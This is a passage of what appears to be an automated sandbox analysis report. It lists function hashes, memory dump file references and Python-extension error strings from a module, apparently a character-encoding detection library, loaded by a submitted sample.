                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 610f13cc42156de412b3f6d1ccc7dde81ee8bb81fe19c5e5436d4dfc6cd023cb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F531A1B1B4A50281EE469B3DEC642F9A3B0BF44B90F58B135DE2D077B5EE2CE4848700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'SuspiciousRange' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuspiciousRange' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-3882440367
                                                                                                                                                                                                                                                                                                  • Opcode ID: edf70cb319030b3d86d441b19e0745afc740f480ca4045dac8bdcfc512da58eb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 48fe6cc754ceb94ae81829844e8aa7c3ea873c24d5cb0b7f58f04852641b88fb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: edf70cb319030b3d86d441b19e0745afc740f480ca4045dac8bdcfc512da58eb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A631A1B1B4A50281EE569B7DECA42B8E3B0FF44B94F58A135DE6E077B4DE2CD4848310
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'SuperWeirdWordPlugin' object attribute '_word_count' cannot be deleted$attribute '_word_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-1212817586
                                                                                                                                                                                                                                                                                                  • Opcode ID: 16b82e3689da71a62fdb9f4fcb28de3a703054875de315429c3694e8e6cd4c3d
                                                                                                                                                                                                                                                                                                  • Instruction ID: d34dc1b1b9e0e859cdb3b4f983dd324622e3bb75bd093b81b28d392a8c26d4ce
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16b82e3689da71a62fdb9f4fcb28de3a703054875de315429c3694e8e6cd4c3d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C93185F1B4A50241EE569B7DECA52B9A3B0AF44B90F58A135DE2D067F5DE2CD4848300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'SuperWeirdWordPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-3920090044
                                                                                                                                                                                                                                                                                                  • Opcode ID: cd35c19dcae03a46ba023d8733dc0448e3e938908ebc375541851ad2aa41712c
                                                                                                                                                                                                                                                                                                  • Instruction ID: f655ffdaab3f97a271732506b967190e9b95db8d3d4e67df87e8202d8bbe0419
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd35c19dcae03a46ba023d8733dc0448e3e938908ebc375541851ad2aa41712c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F13185B1B4A50285EE469B7DECA42B9A3B0AF44B94F58B135DE3D067B5DE2CD4848300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'ArchaicUpperLowerPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'ArchaicUpperLowerPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-4184598959
                                                                                                                                                                                                                                                                                                  • Opcode ID: 342a4cd3f7d259d24aeb9a776a1e708ee513c6b05d4146dbb2a3107d3dc6b54c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8dc255dc224c74af947620a32a6c1ca5727a3ca5829776d4991599e1acf2bdfc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 342a4cd3f7d259d24aeb9a776a1e708ee513c6b05d4146dbb2a3107d3dc6b54c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C63198B1B4A50285EE469B7DEC652B8E370AF44B90F5CA135DE2D067B5DE2CE484C300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • attribute '_suspicious_successive_range_count' of 'SuspiciousRange' undefined, xrefs: 00007FFBAB6A66F8
                                                                                                                                                                                                                                                                                                  • int, xrefs: 00007FFBAB6A67F6
                                                                                                                                                                                                                                                                                                  • 'SuspiciousRange' object attribute '_suspicious_successive_range_count' cannot be deleted, xrefs: 00007FFBAB6A676C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'SuspiciousRange' object attribute '_suspicious_successive_range_count' cannot be deleted$attribute '_suspicious_successive_range_count' of 'SuspiciousRange' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-916769388
                                                                                                                                                                                                                                                                                                  • Opcode ID: 32c8cc5da1c5a4c53662f2a02eb56b9d7fcea26900f0b6a46b27aacae368bd4d
                                                                                                                                                                                                                                                                                                  • Instruction ID: e64381764354486364358bce7746d33f3fd7a3488279db1b90082d8a54243cab
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32c8cc5da1c5a4c53662f2a02eb56b9d7fcea26900f0b6a46b27aacae368bd4d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 143185B1B5A50281EE569B7DEC642B8A3B0EF44B94F58A135DE2D077F9DE2CE484C700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • attribute '_character_count' of 'SuspiciousDuplicateAccentPlugin' undefined, xrefs: 00007FFBAB6A62E8
                                                                                                                                                                                                                                                                                                  • 'SuspiciousDuplicateAccentPlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FFBAB6A635C
                                                                                                                                                                                                                                                                                                  • int, xrefs: 00007FFBAB6A63E6
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuspiciousDuplicateAccentPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-543361526
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1291b6d293bf1ed5ae64a56b00bf1b13860b617c90494c0dd0123d29bd04fbc4
                                                                                                                                                                                                                                                                                                  • Instruction ID: e472e88d7fbd7c9ee3d630547d7f2c3071034a3cf666539294cc4d230a467fa2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1291b6d293bf1ed5ae64a56b00bf1b13860b617c90494c0dd0123d29bd04fbc4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D83192B1B4A50281EE569B7DE8642B8A3B0BF44B94F48B134DE6E477F4DE2CE495C300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • 'TooManySymbolOrPunctuationPlugin' object attribute '_punctuation_count' cannot be deleted, xrefs: 00007FFBAB6A4F3C
                                                                                                                                                                                                                                                                                                  • attribute '_punctuation_count' of 'TooManySymbolOrPunctuationPlugin' undefined, xrefs: 00007FFBAB6A4EC8
                                                                                                                                                                                                                                                                                                  • int, xrefs: 00007FFBAB6A4FC6
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_punctuation_count' cannot be deleted$attribute '_punctuation_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-1459665959
                                                                                                                                                                                                                                                                                                  • Opcode ID: 524d028e614f50b41909a65e2b05ff1c14cbdfe08726ae935d08e3c758078267
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3f60ab99b6dd18af270edd6481931d602a353e1b2cdc3e830b1c1fc7880d8154
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 524d028e614f50b41909a65e2b05ff1c14cbdfe08726ae935d08e3c758078267
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 773185B1B4A50241EE469B7DECA42B8A3B0BF84B90F58B135DE2D067F5DE2CD495C300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'SuperWeirdWordPlugin' object attribute '_foreign_long_count' cannot be deleted$attribute '_foreign_long_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-3135691889
                                                                                                                                                                                                                                                                                                  • Opcode ID: 35cb3d4f2bd9c4a5d37c2cde372bddb3ca93a0b263ca3f3a2d664a0bc4599930
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5c6a82b445f8787b7230caca5d4a4b5c7c065314ef0ca36548d478310040a7ce
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35cb3d4f2bd9c4a5d37c2cde372bddb3ca93a0b263ca3f3a2d664a0bc4599930
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 083194B1B4A50281EE569B7DECA42B9A3B0FF44B90F58A135DE2D467B5DE2CE4848300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'ArabicIsolatedFormPlugin' object attribute '_isolated_form_count' cannot be deleted$attribute '_isolated_form_count' of 'ArabicIsolatedFormPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-4047731557
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1ec334efbc93af8a0daa537c9c947367f6496fe570f3d383ebc24800b9db443f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 00ef25002a7392659446427140ac3616a44ce9249cb1b1ca4562c2fbbda02d49
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ec334efbc93af8a0daa537c9c947367f6496fe570f3d383ebc24800b9db443f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 963196B1B4A50281EE56AB7DEC642B8A3B0FF54B90F58A135DE6E077F5DE2CD4848700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • attribute '_successive_count' of 'SuspiciousDuplicateAccentPlugin' undefined, xrefs: 00007FFBAB6A61A8
                                                                                                                                                                                                                                                                                                  • int, xrefs: 00007FFBAB6A62A6
                                                                                                                                                                                                                                                                                                  • 'SuspiciousDuplicateAccentPlugin' object attribute '_successive_count' cannot be deleted, xrefs: 00007FFBAB6A621C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_successive_count' cannot be deleted$attribute '_successive_count' of 'SuspiciousDuplicateAccentPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-1864222365
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5778859781aa3561020ceb3b05ef8ae724d89a4ce4f3630b9ef98cc72eb7347a
                                                                                                                                                                                                                                                                                                  • Instruction ID: b5a6acd232ffce8e01d9d1bc5246ddc255e9a840642a4bc8ecbc8a91d3ac0dfb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5778859781aa3561020ceb3b05ef8ae724d89a4ce4f3630b9ef98cc72eb7347a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 633172B1B4A50281EE469B7DECA42B8A3B0BF44B94F58A135DE2D477B5DE2CD4848300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'SuperWeirdWordPlugin' object attribute '_bad_word_count' cannot be deleted$attribute '_bad_word_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-3520798986
                                                                                                                                                                                                                                                                                                  • Opcode ID: 77c8772b984a2595aac65ff4e3f8c76f4f621aa382ae6883f4a9f238d60c89b9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0e8769e503fd09cc11ecc1225d1ceeebad34a2693d7b650348431a07be4b3a61
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77c8772b984a2595aac65ff4e3f8c76f4f621aa382ae6883f4a9f238d60c89b9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7331A1B1F4A50281EE569B7DEC642B9A3B0BF44B90F58A135EE2E067B5DE2CD4848300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'ArabicIsolatedFormPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'ArabicIsolatedFormPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-3970786323
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2e629f3262497ccb22304782c1099c2c36976ab49dc67f606c1b062756317bff
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0d504d4af62e5f6629a05a430125ce72b4c5e14c16df892756fd1da90dc3393e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e629f3262497ccb22304782c1099c2c36976ab49dc67f606c1b062756317bff
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 393170B1B4A50281EE569B7DECA52B8A3B0AF44B90F5CA135DE3E467F5DE2CD484C700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'UnprintablePlugin' object attribute '_unprintable_count' cannot be deleted$attribute '_unprintable_count' of 'UnprintablePlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-2997357838
                                                                                                                                                                                                                                                                                                  • Opcode ID: 05d8df805b557c735720644633408e4608b0fbfc31e106f8cc358c40349ee830
                                                                                                                                                                                                                                                                                                  • Instruction ID: f80b08a7e0115d5c479ae2d8f5f30edb21e4dac5c9fcad69c2174c64e735cadb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05d8df805b557c735720644633408e4608b0fbfc31e106f8cc358c40349ee830
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C93173F1A4A50681EE46DB7DECA53B8A3B0AF44B94F58A135DE2E067F5DE2CD484C700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
